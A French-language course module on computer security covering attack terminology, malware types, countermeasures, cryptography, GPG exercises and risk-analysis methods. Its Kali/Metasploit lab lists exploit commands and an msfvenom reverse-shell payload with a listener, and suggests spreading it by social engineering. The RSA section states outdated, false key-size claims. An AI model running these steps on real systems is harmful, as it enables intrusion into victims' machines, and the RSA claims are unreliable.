Module PDF SecuriteInfo
Module PDF SecuriteInfo
informatiques
1.0
Sécurité informatique
Légende
Table des matières
3
Objectifs 5
IV. Cryptographie 25
5. Certificat..................................................................................................... .35
2. Gpg4Win.................................................................................................... .41
4
Objectifs
Au terme de ce module, vous serez à mesure de Maîtriser les concepts de la sécurité
informatique
Comme objectifs spécifiques, au terme de cette séquence, vous serez capable de :
Connaître les terminologies de la sécurité informatique ;
Décrire les types d'attaques ;
Appliquer des contre-mesures ;
Maîtriser les techniques de cryptographie;
Mettre en œuvre une planification/politique de sécurité;
Connaître le cadre réglementaire, institutionnel et juridique.
5
I.Concepts de base de la sécurité
informatique
6
Concepts de base de la sécurité informatique
Définition : Vulnérabilité
C'est une faille de sécurité dans un SI, qu'elle soit exploitable ou non. Une faille de sécurité est
une faute accidentelle ou intentionnelle (avec ou sans volonté de nuire), dans la spécification,
la conception ou la configuration du SI, ou dans la façon selon laquelle il est utilisé.
Définition : Attaque
C'est un moyen d'exploiter une vulnérabilité. C'est une interaction malveillante avec le
système informatique d'origine externe créée avec l'intention de nuire.
Pour une même vulnérabilité, il peut y avoir plusieurs attaques possibles.
7
Concepts de base de la sécurité informatique
Définition : Menace
C'est un acteur capable de mener une attaque en exploitant une vulnérabilité.
Définition : Risque
C'est la probabilité plus ou moins grande de voir une menace se transformer en événement
réel entraînant une perte.
Les risques informatiques peuvent être d'origine naturelle ou humaine, accidentelle ou
intentionnelle.
Définition : Contre-mesure
C'est une procédure ou technique permettant de résoudre une vulnérabilité ou de contrer une
attaque donnée.
8
Concepts de base de la sécurité informatique
9
Concepts de base de la sécurité informatique
la disponibilité.
Dans la littérature on ajoute souvent à ces 3 objectifs : la Non-répudiation, l'Authentification,
la traçabilité, l'auditabilité.
Définition : Authentification
L'authentification permet d'assurer que les acteurs (personne, machine, programme,
processus) qui accèdent à une ressource (machine, équipement, programme, donnée,
processus, réseau) sont ceux autorisés à le faire;
Elle renvoie à la première idée de la notion de signature (Signature = Authentification)
à savoir que le signataire est le seul à pouvoir réaliser la signature;
Elle implique un moyen de prouver l'identité d'un acteur grâce à :
- ce que connaît l'utilisateur (paire pseudonyme / mot de passe);
- ce que détient l'utilisateur (carte à puces),
- ce qu'est l'utilisateur (information biométrique).
Définition : Non-répudiation
La non-répudiation permet d'assurer que l'auteur d'un acte ne peut pas ensuite nier
l'avoir effectué;
Elle renvoie à la seconde idée de la notion de signature (Signature = Authentification +
Non répudiation) à savoir que le signataire s'engage à honorer sa signature
(engagement contractuel/juridique);
Elle implique deux aspects dans une transaction numérique:
- La preuve d'origine : un message (une transaction) ne peut être nié par son
émetteur;
- La preuve de réception : un récepteur ne peut ultérieurement nier avoir reçu un
ordre s'il ne lui a pas plu de l'exécuter alors qu'il le devait juridiquement.
Définition : Confidentialité
La confidentialité permet d'assurer qu'une donnée ne peut être lue que par des acteurs
habilités (selon des contraintes précises);
10
Concepts de base de la sécurité informatique
Elle implique que seuls les acteurs autorisés peuvent avoir accès aux informations qui
leur sont destinées. Tout accès indésirable doit être empêché. Toute interception ne
doit pas être en mesure d'aboutir, les données doivent être cryptées, seuls les acteurs
de la transaction possédant la clé de compréhension.
Définition : Intégrité
L'intégrité permet d'assurer qu'une donnée n'est modifiée que par des acteurs habilités
(selon des contraintes précises);
Elle implique que les données doivent être celles que l'on attend, et ne doivent pas être
altérées de façon fortuite, illicite ou malveillante en cours de communication. L'intégrité
des données doit valider l'intégralité des données, leur précision, l'authenticité et la
validité.
Définition : Disponibilité
La disponibilité permet d'assurer que l'information sur le système soit disponible aux
acteurs autorisés;
Elle implique que le système doit fonctionner sans faille durant les périodes d'utilisation
prévues et garantir l'accès aux services et ressources installées avec le temps de
réponse attendu.
Définition : Traçabilité
Elle permet de garantir que les accès et tentatives d'accès aux ressources sont tracés et que
ces traces sont conservées et exploitables.
Définition : Auditabilité
L'auditabilité permet d'assurer de la capacité à détecter et à enregistrer de façon
infalsifiable les tentatives de violation de la politique de sécurité;
Elle a pour but de garantir une maîtrise complète et permanente sur le système et en
particulier pouvoir retracer tous les événements au cours d'une certaine période;
L'audit est un examen méthodique d'une situation relative à un produit, un processus,
une organisation, réalisé en coopération avec les intéressés en vue de vérifier la
conformité de cette situation aux dispositions préétablies, et l'adéquation de ces
dernières à l'objectif recherché.
11
Concepts de base de la sécurité informatique
12
Concepts de base de la sécurité informatique
13
Concepts de base de la sécurité informatique
Définition : Interruption
Manifestation : un maillon du système informatique est détruit ou devient indisponible
ou inutilisable;
Principe de sécurité touché : disponibilité;
Exemples : destruction matérielle (disque dur, câble réseau).
Définition : Interception
Manifestation : un acteur non autorisé obtient l'accès à un maillon du système
informatique ;
Principe de sécurité touché : confidentialité;
Exemples : écoute téléphonique (capture de données sur le réseau), copie non
autorisée de programmes/données.
Définition : Modification
Manifestation : un acteur non autorisé obtient l'accès à un maillon du système
informatique et le modifie (de façon presque indétectable);
Principe de sécurité touché : intégrité;
Exemples : modification des données transmises sur un réseau, altération de
données/programmes, ...
Définition : Fabrication
Manifestation : un acteur non autorisé insère des contrefaçons dans le système
informatique;
Principe de sécurité touché : authenticité;
Exemples : ajout de faux messages sur le réseau, ajout de données dans un fichier, ...
14
Concepts de base de la sécurité informatique
Description Exemple
C'est une partie d'un malware qui reste
Le virus Tchernobyl, qui fut l'un des virus les
dormante dans le système hôte jusqu'à un
plus déstructeurs, avait une bombe logique qui
déclencheur (instant précis, ou survenance
Bombe logique s'est activée le 26 avril 1999, jour du treizième
d'un événement, ou encore la réunion de
anniversaire de la catastrophe nucléaire de
certaines conditions), pour lancer des effets
Tchernobyl.
dévastateurs.
Trojan.ByteVerify est un cheval de Troie
sous forme d'une applet java. Ce cheval de
C'est est un programme effectuant une
Troie exploitait une vulnérabilité de la
fonction illicite tout en donnant l'apparence
machine virtuelle java de Microsoft permettant
Cheval de Troie d'effectuer une fonction légitime. La fonction
à un pirate d'exécuter du code arbitraire sur la
illicite peut consister en la divulgation ou
machine infectée. Par exemple,
l'altération d'informations.
Trojan.ByteVerify pouvait modifier la page
d'accueil d'Internet explorer.
Au début des années 2000, il y avait une porte
C'est est un moyen de contourner les
dérobée dans le SGBD interbase de Borland .
mécanismes de contrôle d'accès. Il s'agit d'une
Il suffisait d'entrer le nom d'utilisateur
faille du système de sécurité due à une faute
politically et le mot de passe correct pour se
Backdoor de conception accidentelle ou intentionnelle
connecter à la base de données avec les droits
(cheval de Troie en particulier). C'est donc
d'administrateur. Beaucoup fréquents dans les
une fonctionnalité inconnue de l'utilisateur
équipements réseaux (routeur) et IOT :
légitime qui donne un accès secret au logiciel.
comptes admin par défaut ...
C'est un programme qui peut se reproduire en
s'adjoignant à un autre programme (du
système ou d'une application) et qui devient
PsybOt, découvert en 2009, est un virus
ainsi un cheval de Troie. Il peut se propager à
Virus informatique ayant la capacité d'infecter les
d'autres ordinateurs à l'aide du programme
routeurs et modems haut débit.
légitime sur lequel il s'est greffé. Il peut aussi
avoir comme effets de nuire en perturbant le
fonctionnement de l’ordinateur infecté.
C'est un programme autonome qui se
reproduit et se propage à l'insu des
utilisateurs. Contrairement aux virus, un ver
n'a pas besoin d'un logiciel hôte pour se
dupliquer. Le ver a habituellement un objectif
Vers malicieux comme : espionner l'ordinateur
dans lequel il réside, offrir une porte dérobée
à des pirates informatiques, détruire des
données sur l'ordinateur infecté, ou envoyer Le ver Blaster avait pour but de lancer une
de multiples requêtes vers un serveur Internet attaque par DoS sur le serveur de mises à jour
dans le but de le saturer. de Microsoft.
C'est un programme qui fait de la collecte
d'informations personnelles sur l'ordinateur
Spyware ou logiciel espion
d'un utilisateur sans son autorisation et les
transmet à un ordinateur tiers.
Tableau 2 : quelques malwares
15
Concepts de base de la sécurité informatique
16
II.Vulnérabilités, menaces, attaques, et
contre-mesures
Pour se protéger des malwares, il convient de les connaître, de connaître les vulnérabilités qui
en sont à l'origine, afin de prendre les contre-mesures efficaces. C'est pourquoi en sécurité
informatique on étudie les malwares.
Ce module présente certains des types de malwares les plus répandus ainsi que les contre-
mesures correspondantes.
1. Principales menaces-attaques
Définition : L'intrusion
L'intrusion dans un système informatique a généralement pour but la réalisation d'une menace
et est donc une attaque. Les conséquences peuvent être catastrophiques : vol, fraude, incident
diplomatique, chantage...
17
Vulnérabilités, menaces, attaques, et contre-
mesures
Mesure pour parer à l'ingénierie sociale
Aucun dispositif de protection ne peut protéger l'utilisateur contre ce type d'attaque
(arnaques), hormis une formation et le bon sens.
18
Vulnérabilités, menaces, attaques, et contre-
mesures
Mesure pour parer au spoofing
Il faut penser à des mécanismes de gestion d'accès à plusieurs facteurs (pseudonyme/mot de
passe et confirmation par un code envoyé par SMS par exemple).
Définition : La perturbation
C'est une attaque sur le réseau visant à fausser le comportement du système ou à l'empêcher
de fonctionner comme prévu (saturation, dégradation du temps de réponse, génération
d'erreurs...).
Définition : Le brouillage
C'est une attaque réseau de haut niveau qui vise à rendre le système inopérant.
2. Logiciel malveillants
Le virus
Un virus est un logiciel malveillant, généralement de petite taille, qui se transmet par les
réseaux ou les supports d'information amovibles, s'implante au sein des programmes en les
parasitant, se duplique à l'insu des utilisateurs et produit ses effets dommageables quand le
programme infecté est exécuté ou quand survient un événement donné.
19
Vulnérabilités, menaces, attaques, et contre-
mesures
Sur Internet, les virus peuvent contaminer une machine de plusieurs manières :
Téléchargement de logiciel puis exécution de celui-ci sans précautions ;
Ouverture sans précautions de documents contenant des macros ;
Pièce jointe de courrier électronique (exécutable, script type vbs...) ;
Exploitation d'un bug du logiciel de courrier.
La meilleure parade est l'utilisation d'un antivirus à jour et d'effectuer les mises à jour des
logiciels (pour éviter l'exploitation des bugs).
Le ver (worm)
Un ver est un logiciel malveillant indépendant qui se transmet d'ordinateur à ordinateur par
l'Internet ou tout autre réseau en utilisant les failles existantes et perturbe le fonctionnement
des systèmes concernés en s'exécutant à l'insu des utilisateurs.
Contrairement au virus, le ver ne s'implante pas au sein d'un autre programme.
En plus, le ver peut se propager de lui-même sur un réseau sans qu'il ne soit soumis à aucun
stimulus particulier. Ses programmes malicieux se reproduisent par eux-mêmes à l'intérieur
même des ordinateurs infectés ainsi que sur les ordinateurs auquel il a accès à partir des
machines infectées. Alors que le virus nécessitera d'être « activé » pour faire effet, le
programme transportant le virus devant être effectué ou certain.
Le moyen le plus efficace de se protéger contre un ver ou d'un virus est de toujours faire ses
mises à jour régulièrement et de se prémunir d'un pare-feu et d'un antivirus efficace.
Ceux-ci utilisant des failles souvent connues dans divers logiciels, il est aisé pour eux de
s'introduire sur une machine qui n'est pas prête à se faire attaquer.
Le ransomware
Un ransomware est un logiciel malveillant qui prend en otage les ressources informatiques qui
pourront être éventuellement libérées après le payement d'une rançon, cela permet d'effectuer
du chantage et d'escroquer des victimes.
Le rootkit
Le rootkit est un ensemble de logiciels permettant généralement d'obtenir les droits
d'administrateur sur une machine, d'installer une porte dérobée, de truquer les informations
20
Vulnérabilités, menaces, attaques, et contre-
mesures
susceptibles de révéler la compromission, et d'effacer les traces laissées par l'opération dans
les journaux système.
3. Mécanismes de protection
Types de mécanisme
Face aux attaques, aux menaces et aux vulnérabilités informatiques, plusieurs mécanismes de
protection peuvent être envisagé à savoir:
Les mots de passe ;
Les antivirus ;
Les firewall (Pare-feu) ;
Les anti-logiciels espions ;
Les précautions et bonne attitude,...
21
Vulnérabilités, menaces, attaques, et contre-
mesures
Changer le mot de passe au moindre soupçon de compromission ;
Ne pas pré-enregistrer vos mots de passe dans les navigateurs, notamment lors de
l'utilisation ou la connexion à un ordinateur public ou partagé (salons, déplacements...).
L'antivirus
L'antivirus est un logiciel de sécurité qui procède, automatiquement ou sur demande, à
l'analyse des fichiers et de la mémoire d'un ordinateur, soit pour empêcher toute introduction
parasite, soit pour détecter et éradiquer tout virus dans un système informatique.
L'antivirus détecte et éventuellement détruit des logiciels malveillants. Historiquement, les
antivirus ne combattaient que les virus. Depuis quelques années les éditeurs d'antivirus ont
rajouté des modules contre les autres types de logiciels malveillants (spyware, backdoor...).
Il est à noter que certains logiciels de sécurités se présentent comme des antimalwares pour
bien faire comprendre qu'ils luttent contre tous les types de logiciels malveillants et pas
seulement contre les virus. Il est même possible de trouver des logiciels qui sont à la fois
antivirus et pare-feu.
On peut classer les antivirus en deux catégories en fonction de la méthode utilisée pour
détecter les virus:
Les antivirus traditionnels qui disposent d'une base de données des virus qu'ils doivent
chercher et détruire.
Les antivirus heuristiques qui surveillent en permanence l'activité des logiciels pour
détecter un comportement anormal et ainsi repérer d'éventuels virus.
Certains antivirus utilisent les deux techniques de détection afin de maximiser la sécurité de
l'ordinateur.
Les antivirus traditionnels nécessitent une mise à jour constante de leur base de données. En
effet ces antivirus sont incapable de détecter des virus qui ne sont pas inscrits dans leur base
de données. La valeur de ce type d'antivirus dépend donc de la capacité de son éditeur à
mettre à jour la base de données pour qu'elle contiennent les derniers virus.
Lorsqu'un antivirus cherche un virus, il scanne l'ordinateur. Une fois qu'il a trouvé le virus, il
essaye de le détruire. Parfois le virus s'est inséré dans un fichier utile à l'ordinateur et
l'antivirus ne peut pas le détruire sans risquer d'endommager l'ordinateur. Dans ce cas,
l'antivirus met en quarantaine le fichier. Cela signifie qu'il le met à part et l'empêche de se
reproduire ou de communiquer avec d'autres fichiers.
Parefeu ou firewall
Le firewall ou Pare-feu est un dispositif informatique (logiciel ou ordinateur) qui permet le
passage sélectif des flux d'informations entre le système informatique de l'entité et un réseau
externe, dans le but de neutraliser les tentatives d'accès non autorisé au système en
provenance de l'extérieur de l'entité et de maîtriser les accès vers l'extérieur.
Le pare-feu sépare deux réseaux qui ont des niveaux de sécurité différents. Le pare-feu filtre
les données qui passent d'un réseau à un autre avec pour objectif de repérer les données qui
ne respectent pas des règles fixées par l'utilisateur.
Un pare-feu peut empêcher un pirate de se connecter à votre ordinateur.
* *
*
Dans ce module, nous avons présenté des menaces et des attaques dans un premier temps,
puis les logiciels malveillants dans un second temps avant de présenter les mécanismes de
protection.
22
III.Attaques et Malware avec KALI Linux
et le Framework Metasploitable 2
Objectifs
Connaître les types de menaces et d'attaques ;
Mettre en œuvre un exploit.
Pour apprendre à défendre un système informatique, il faut se mettre, des fois, du côté des
hackers pour voir comment ils agissent. Dans ce TP, nous allons utiliser une machine virtuelle
KALI Linux avec des outils comme Metasploitable, qui nous permettent d'agir comme des
hackers. Le but est purement académique et il faut rester dans ce cadre ; la législation
Burkinabè punit les débordements ; dans certains pays, pour utiliser KALI, il faudrait une
autorisation ....
Dans ce TP, nous utiliserons KALI Linux sur une machine virtuelle pour éviter des effets
indésirables sur nos PC.
Le TP est fait sur un Windows 10 mais devrait marcher sur Ubuntu ou iOS.
1. Installations et configurations
Installations
1. Installer Oracle VirtualBox-6.1.22 ;
2. Importer la machine virtuelle KALI-TP ;
3. Comme c'est linux, la première chose à faire est de mettre à jour KALI ainsi que les
outils:
a. sudo apt-get update ;
b. sudo apt-get upgrade ;
4. Pour les besoins du TP, il serait bien que les machines virtuelles soient sur le même
réseau.
23
Attaques et Malware avec KALI Linux et le
Framework Metasploitable 2
6. Voir les détails d'un exploit avec la commande info
exploit/linux/misc/asus_infosvr_auth_bypass_exec
7. Pour utiliser un exploit, utiliser la commande use
exploit/linux/misc/asus_infosvr_auth_bypass_exec
8. Pour définir la cible, il y a deux commandes :
a. SET RHOST 192.168.43.31
b. SET RPORT 23
9. Pour lancer l'exploit, utiliser la commande exploit
10. Si les étapes précédentes ont réussies, vous avez l'accès en commande à la cible. Dans
ce cas tester et commenter :
a. whoami
b. hostname
c. uname -a
d. id
e. ifconfig
2. Exploits et Virus
Tester un exploit
Dans cette partie nous allons tenter un autre exploit. Testez et commentez :
1. show exploits
2. search ssh_version
3. use auxilliary/fuzzers/ssh/ssh_version_15
4. show options
5. nmap –A domaineCible –p 22 –vv
6. set RHOST adresseLigneprecedente
7. run
Si le port 22 de la cible est ouvert votre attaque aurait réussi sinon vous verrez filtered au
niveau du port ...
Malwares
On peut créer des malwares. Pour créer un virus ciblant Windows, on pourrait utiliser les
commandes suivantes :
msfvenom –p windows/metrepreter_reverse_tcp –f exe –a x86 –-platform windows
LHOST=votreIP LPORT=4444 –o incroyable.exe
Attention, cela va créer dans votre répertoire local un virus incroyable.exe. Pour que ce virus
soit un cheval de Troie, nous pouvons utiliser les commandes suivantes :
1. use multi/handler
2. set PAYLOAD windows/metrepreter_reverse_tcp
3. set LHOST votreIP
4. set LPORT 4444
5. exploit
Puis nous débrouiller (social engineering) pour répandre le virus. Ainsi lorsque la victime lance
le virus (et qu'elle est sur Internet ou sur votre réseau) vous pourrez prendre en main sa
machine.
24
IV.Cryptographie
Définition : Cryptographie
C'est l'art de transformer un message clair en un message inintelligible pour celui qui ne
possède pas les clés de déchiffrement.
Définition : Cryptanalyse
C'est l'art de décrypter des messages chiffrés.
Définition : Cryptologie
C'est la branche des mathématiques qui traite de la cryptographie et de la cryptanalyse.
Généralités
Comme méthodes, on peut citer :
Chiffrement mono-alphabétique de Jules César ;
Chiffrement mono-alphabétique ROT13 ;
Chiffrement poly-alphabétique de Blaise de Vigenère ;
25
Cryptographie
26
Cryptographie
27
Cryptographie
3. Cryptographie moderne
Types de chiffrement
Il existe 2 types de chiffrement :
Chiffrement symétrique (clé secrète) : la clé de chiffrement et celle de déchiffrement
sont les mêmes;
Chiffrement asymétrique (clé publique) : les clés de chiffrement et de déchiffrement
sont différentes.
Il est possible de combiner les 2 types.
Cryptographie symétrique
Pour assurer la confidentialité :
- on chiffre le message avec la clé secrète partagée avec le destinataire seul;
- la personne avec laquelle on partage la clé secrète peut alors déchiffrer le message.
Deux problèmes se posent dans ce type de chiffrement :
- Comment envoyer la clé au destinataire ? cela nécessite un canal sécurisé pour le
partage des clés ;
- Si on a n interlocuteurs, le nombre de clés à distribuer devient important : n(n-1)/2
28
Cryptographie
Cryptographique asymétrique
Connue sous le nom de cryptographie à clé publique elle est basée sur le partage de clés
publiques entre utilisateurs. Son principe a été introduit en 1976 par Diffie-Hellman. L'objectif
est d'échanger des clés à travers un canal non sécurisé. Les caractéristiques principales sont :
Les clés sont créées par couple clé privée / clé publique associées (on décide
arbitrairement qu'une est publique et l'autre privée);
Son principe est que tout message chiffré avec une clé publique est déchiffré avec la clé
privée associée ;
La connaissance d'une des deux clés ne permet pas de déduire l'autre.
Pour assurer la confidentialité :
On chiffre le message avec la clé publique du destinataire;
Seule la personne qui possède la clé privée associée à la clé de chiffrement peut
déchiffrer le message.
29
Cryptographie
RSA
C'est le plus populaire des systèmes à clé publique. Inventé en 1978 par Ronald Rivest, Adi
Shamir et Leonard Adelman (Origine du sigle RSA), son fonctionnement est basé sur la
difficulté de factoriser de grands entiers qui sont le produit de deux grands entiers premiers.
Il existe plusieurs modes de RSA :
Mode faible : les clés RSA sont de 384 bits et les clés de cette taille sont cassables ;
Mode commercial : les clés RSA sont de 512 bits et sont considérées comme sûres pour
le grand public ;
Mode renforcé : les clés RSA sont de 1024 bits et sont incassables même avec des
moyens énormes (domaine militaire).
30
Cryptographie
Diffie-Hellman
C'est un système utilisé pour l'échange de clés dans un canal public non sécurisé. Il utilise
deux constantes :
Un nombre premier p (au moins 1024 bits) ;
Un nombre g (d'ordre maximal p-1).
31
Cryptographie
6. Awa envoie à Baba une signature basée sur les deux valeurs publiques, et la chiffre
avec la clé de session SAB ;
7. Enfin, Baba déchiffre ce message en s'assurant que la clé est connue des deux
personnes, et vérifie la signature pour s'assurer que Awa a bien reçu sa valeur
publique.
Notion de signature
C'est un procédé permettant de garantir l'authenticité de l'expéditeur (émetteur), de vérifier
l'intégrité et d'assurer la non-répudiation d'un message. C'est est un condensé ou une
empreinte de message crypté joint au message concerné.
32
Cryptographie
Principe de la signature
La signature débute par l'emploi d'une fonction de hachage :
- cohérente car elle génère toujours le même condensé associé à un message donné ;
- unique car deux messages différents ne doivent jamais produire le même condensé
(absence ou risque faible de collisions) ;
- non réversible car ne permettant pas de retrouver le message à partir de son
condensé.
Le condensé est appelé empreinte digitale (fingerprint) du message ou encore
condensat ;
Le chiffrement du condensé avec la clé privée de l'expéditeur termine la production de
la signature.
33
Cryptographie
34
Cryptographie
5. Certificat
Contenu du certificat
Un certificat est composé de 2 parties :
une partie contenant les informations (Data) ;
et un partie contenant la signature de l'autorité de certification.
35
Cryptographie
Vérification du certificat
Pour vérifier un certificat, il faut :
Vérifier la date de validité du certificat et l'usage prévu pour ce certificat ;
Vérifier que le certificat n'est pas révoqué en utilisant la liste de révocation (CRL) de la
CA émettrice ;
Vérifier que la CA est une CA de confiance ;
Vérifier la signature du certificat avec la clé publique de l'autorité de certification
Standards
Il y a deux grands standards de certificat :
Le standard X509 conçu pour fournir des services de répertoires sur de grands réseaux
informatiques ;
Les standards PKCS conçus par RSA Security. Certains de ces standards (en particulier
le standard PKCS 12) sont aujourd'hui très largement acceptés par les applications.
36
Cryptographie
C'est aussi une structure technique et administrative qui permet la mise en place, lors de
l'échange de clés, de relations de confiance entre différentes entités (morales, physiques ou
logiques).
Son rôle est d'assurer la gestion des certificats à clés publiques et de protéger la confidentialité
des secrets qu'elle gère.
Les services de base d'une PKI sont :
l'authentification ;
l'intégrité ;
la non-répudiation ;
la confidentialité ;
le contrôle d'accès.
37
Cryptographie
38
Cryptographie
Révocation de certificat
Il peut arriver des situations où il faut révoquer les certificats :
en cas de compromission de la clé privée (perte, vol, ...) ;
en cas de modification des données d'authentification ;
en cas de modification des droits, ...
La vérification du certificat d'une personne est de la responsabilité de ses correspondants. Par
exemple, si Baba veut communiquer avec Awa, il doit pouvoir accéder à l'annuaire gérant les
informations sur la validité des certificats.
Plusieurs façons d'implémenter la révocation de certificats existent :
le mécanisme de publication périodique est la méthode la plus utilisée :
- CRL ;
- ARL : un type de CRL consacré seulement aux informations de révocation associées
à la CA ;
- CRL distribution Points : façon standard de partitionner les CRLs.
le mécanisme de révocation en ligne, par exemple : Online Certificate Status Protocol
(OCSP).
39
V.Atelier sur la cryptographie
Objectifs
Maîtriser les technologies de la cryptographie
Avec HashTab
1. Installer HashTab ;
2. Pour calculer l'empreinte de votre fichier :
a. cliquer droit sur le fichier à vérifier et faites Propriétés ;
b. cliquer sur l'onglet Hachages. HashTab calcule automatiquement les empreintes du
fichier selon les fonctions de hachage sélectionnées (définies dans Paramètres) ;
3. Pour vérifier l'intégrité du fichier, collez l'empreinte fournie par l'expéditeur dans le
champ Comparaison de hachages.
4. NB : sur Ubuntu les commandes md5sum fichier, sha1sum fichier et sha256sum
fichier ... permettent de faire pareil.
Travail à faire
1. Créer un fichier texte contenant un petit paragraphe, et calculer l'empreinte numérique
de ce document avec md5, sha1 et sha256 et donnez l'empreinte obtenue avec chaque
algorithme. Donnez la taille de chaque empreinte (en bits).
2. Modifier un caractère dans le fichier texte, et calculez à nouveau les empreintes
numériques md5, sha1 et sha256. Que constatez-vous ?
3. Quelle est l'utilité de l'empreinte numérique ?
4. Laquelle des méthodes d'empreinte numérique précédentes (md5, sha1 et sha256)
recommanderez-vous, et pourquoi ?
40
Atelier sur la cryptographie
2. Gpg4Win
Généralités
GnuGPG est le logiciel Open Source le plus utilisé au monde pour assurer les services de
confidentialité et authentification de données numériques (fichier / répertoire / email).
La confidentialité est permise par chiffrement du message.
L'authentification est gérée par la signature numérique.
GnuGPG est une implémentation Libre de la spécification OpenGPG (RFC 4880). Il ne faut pas
confondre GPG (Gnu Privacy Guard) et le logicel propriétaire Pretty Goog Privacy (PGP) de Paul
Zimmermann, désormais géré par l'éditeur Symantec (pgp.com).
De nombreux outils open source s'appuient sur GPG pour des aspects de chiffrement et
authentification ; GpG4Win est un outil graphique pour Windows permettant d'exploiter
GnuPGP. La capacité de répondre aux questions suivantes permettra une meilleure
appropriation de l'outil (voir https://www.gpg4win.org/features.html ).
1. Qu'est-ce que la cryptographie symétrique ?
2. Qu'est-ce que la cryptographie à clé publique ?
3. Quel est l'algorithme de cryptage par défaut ainsi que la taille des clés par défaut de
GpG4Win?
4. Qu'est-ce qu'un algorithme de Hachage ? Expliquer quels sont les algorithmes de
hachage disponibles par défaut dans Gpg4Win.
5. Qu'est-ce qu'un certificat ? Expliquer quels sont les deux formats de certificats
supportés par GpG4Win.
Utilisation
1. Installer GpG4Win. C'est un ensemble de logiciels comprenant :
- KLEOPATRA est le gestionnaire de certificats format X.509 ou OpenPGP ;
- GpGOL : plugin GpG pour Outlook pour encrypter et signer des emails directement
depuis outlook ;
- GpGEx : plugin GpG pour Explorateur Windows pour encrypter et signer directement
depuis l'explorateur Windows ;
- COMPENDIUM : documentation (env 200p) sur Kleopatra, GpgEX, PGP/MIME,
S/MIME et X.509.
2. Créer une clé privée :
a. Lancer GPA (Gnu Privacy Assistant). Lors du premier démarrage, GPA vous signale
que vous ne disposez pas encore de clé de chiffrement. Cliquer sur Générer la clef
maintenant dans la boîte de dialogue qui s'affiche.
b. Remplir les différents champs nécessaires à la création : votre nom, un votre
adresse e-mail et un mot de passe d'au moins 8 caractères.
c. Après quelques secondes de calcul, le logiciel vous signale que votre clé est créée.
Une boîte de dialogue vous suggère alors d'en effectuer une sauvegarde. Vous
sauvegardez alors sur votre disque dur ou votre clé (lequel est plus sécurisé ?). A
chaque fois que vous correspondrez avec une nouvelle personne, il vous faudra lui
demander sa clef... Et lui envoyer la vôtre si vous voulez avoir une réponse. Vous
pouvez aussi coder vos messages avec votre clef. Pour décoder le message, le
destinataire devra entrer votre clé.
d. Travail à faire : communiquer avec un de vos camarades en utilisant vos clés.
3. Utiliser Gpg4win avec les logiciels de messagerie :
a. Utiliser Gpg4win avec Outlook (GpgOL) : si vous avez procédé à l'installation du
plug-in GpgOL, Outlook disposera de commandes spécifiques. Il suffit simplement
de les sélectionner dans la barre d'outils pour signer, chiffrer ou déchiffrer les
messages.
b. Utiliser Gpg4win avec Thunderbird (Enigmail) : si vous utilisez Thunderbird, il vous
faut installer l'extension Enigmail (fourni). Sitôt le plug-in installé, de nouvelles
41
Atelier sur la cryptographie
commandes apparaîtront dans la barre d'outils pour signer, chiffrer ou déchiffrer les
messages.
c. Si votre logiciel ne dispose pas de plug-in Gpg4win, vous pouvez chiffrer, déchiffrer
ou signer les messages en passant par le logiciel GPA. L'opération se fait par
l'intermédiaire du presse-papiers. Dans GPA, affichez la fenêtre Presse-papiers
(accessible via la barre d'outils ou le menu Fenêtres). Tapez ou collez le texte dans
cette fenêtre puis choisissez la commande Chiffrer (ou Signer).
d. Si vous recevez la clé d'un ami, vous pouvez l'ajouter à votre porte-clés (bouton
Importer dans GPA). A chaque fois que vous rencontrerez un nouvel utilisateur,
vous devrez lui demander sa clé.
e. Travail à faire :
i. signer un mail et envoyer à un de vos camarades qui devra vérifier votre
signature puis vous envoyer un mail signé que vous vérifierez.
ii. chiffrer un document et envoyer lui pour qu'il déchiffre et vous renvoie un fichier
chiffré que vous devrez déchiffrer.
42
VI.Politique de sécurité
43
Politique de sécurité
MARION
MARION pour Méthode d'Analyse des Risques Informatiques et Optimisation par Niveau, c'est
une méthode d'audit de la sécurité d'une entreprise, proposée en 1983 par le CLUSIF (Club de
la sécurité de l'information française) mais abandonnée en 1998 au profit de la méthode
MEHARI. Elle donne une évaluation chiffrée du risque informatique. Elle repose sur l'évaluation
des aspects organisationnels et techniques de la sécurité de l'entreprise à auditer. Son objectif
est de :
situer l'entreprise auditée par rapport à un niveau jugé correct, et par rapport au
niveau atteint par les entreprises similaires;
identifier les menaces et vulnérabilités à contrer.
COBIT
COBIT pour Control OBjectives for Information and Technology ISAC, propose un référentiel
pour les systèmes d'information.
EBIOS
EBIOS pour Expression des Besoins et Identification des Objectifs de Sécurité, permet
d'identifier les risques d'un SI et de proposer une politique de sécurité adaptée aux besoins de
l'entreprise ;
44
Politique de sécurité
MEHARI
MEHARI pour MEthode Harmonisée d'Analyse de RIsques, est développée par le CLUSIF en
1995 et consiste en l'analyse des enjeux de sécurité pour spécifier les scénarios redoutés, et
en la classification préalable des entités du SI en fonction de trois critères de sécurité de base
(confidentialité, intégrité, disponibilité). Ces enjeux expriment les dysfonctionnements ayant
un impact direct sur l'activité de l'entreprise. Puis, des audits identifient les vulnérabilités du
SI. Et enfin, l'analyse des risques proprement dite est réalisée. Il s'articule autour de 3 types
de livrables :
Le Plan Stratégique de Sécurité (PSS) qui fixe les objectifs de sécurité ainsi que les
métriques permettant de les mesurer;
Le Plan Opérationnel de Sécurité (POS) qui définit pour chaque site les mesures de
sécurité qui doivent être mises en œuvre;
Le Plan Opérationnel d'Entreprise (POE) qui assure le suivi de la sécurité par
l'élaboration d'indicateurs sur les risques identifiés et le choix des scénarios de
catastrophe contre lesquels il faut se prémunir.
OCTAVE
OCTAVE pour Operationally Critical Threat, Asset, and Vulnerability Evaluation, a été créé par
l'université de Carnegie Mellon (USA) en 1999, a pour but de permettre à une entreprise de
réaliser par elle-même l'analyse des risques de son SI en se basant sur un catalogue de
bonnes pratiques de sécurité qui est fourni avec la méthode. Elle est centrée sur la protection
des actifs de l'entreprise et le management du personnel, couvre l'ensemble des processus
métiers de l'entreprise à tous les niveaux (organisationnel et technique). Elle est constituée de
3 étapes : Vue organisationnelle, Vue technique et Stratégie de sécurité. Ces vues
fonctionnent comme suit :
La vue organisationnelle permet d'identifier les actifs de l'entreprise, les menaces qui
pèsent sur son fonctionnement, les vulnérabilités de son organisation, les objectifs de
sécurité imposés par la direction et les mesures actuelles de sécurité ;
La vue technique identifie les éléments essentiels de chaque actif identifié plus haut et
les audite afin d'en connaître les vulnérabilités ;
Le développement de la stratégie de sécurité consiste à évaluer les risques identifiés
(impact, probabilité) plus haut et à proposer les mesures permettant de les réduire.
CRAMM
CRAMM pour CCTA Risk Analysis and Management Method, c'est une méthode exhaustive
